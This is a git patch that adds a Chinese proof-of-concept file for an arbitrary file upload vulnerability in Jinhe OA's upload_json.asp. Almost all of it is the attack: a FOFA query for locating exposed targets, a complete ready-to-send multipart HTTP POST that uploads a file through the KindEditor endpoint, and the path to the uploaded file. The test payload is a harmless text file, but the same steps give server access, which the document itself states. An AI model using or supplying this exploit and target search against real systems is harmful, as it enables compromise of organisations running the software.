From 172e7042ab8cd8fae52d09cb8ea25c87a8c780c3 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sun, 14 Jan 2024 19:53:03 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E9=87=91=E5=92=8COA=5Fupload=5Fjson.a?= =?UTF-8?q?sp=E5=AD=98=E5=9C=A8=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6?= =?UTF-8?q?=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 金和OA_upload_json.asp存在任意文件上传漏洞.md | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 金和OA_upload_json.asp存在任意文件上传漏洞.md diff --git a/金和OA_upload_json.asp存在任意文件上传漏洞.md b/金和OA_upload_json.asp存在任意文件上传漏洞.md new file mode 100644 index 0000000..73d6a2b --- /dev/null +++ b/金和OA_upload_json.asp存在任意文件上传漏洞.md @@ -0,0 +1,39 @@ +## 金和OA_upload_json.asp存在任意文件上传漏洞 + +金和OA upload_json.asp存在任意文件上传漏洞,攻击者可通过此漏洞获取服务器权限。 + + +## fofa +``` +app="金和网络-金和OA" +``` + +## poc +``` +POST /c6/KindEditor1/asp/upload_json.asp?dir=file HTTP/1.1 +Host: your_ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 +Content-Length: 338 +Accept: */* +Accept-Encoding: gzip, deflate +Connection: close +Content-Type: multipart/form-data; boundary=---------------------------153857212076213662067051609723 + +-----------------------------153857212076213662067051609723 +Content-Disposition: form-data; name="localUrl" + + +-----------------------------153857212076213662067051609723 +Content-Disposition: form-data; name="imgFile"; filename="hhh.txt" +Content-Type: image/png + +hhh +-----------------------------153857212076213662067051609723-- +``` + +![image](https://github.com/wy876/POC/assets/139549762/2c14919b-e00d-49bf-8b94-21b5696bb8fe) + +访问上传的文件 +/c6/KindEditor1/asp/../attached/file/20240103/20240103164534323432.txt + +![image](https://github.com/wy876/POC/assets/139549762/20dd3197-a7f9-4a74-863d-050603eab427)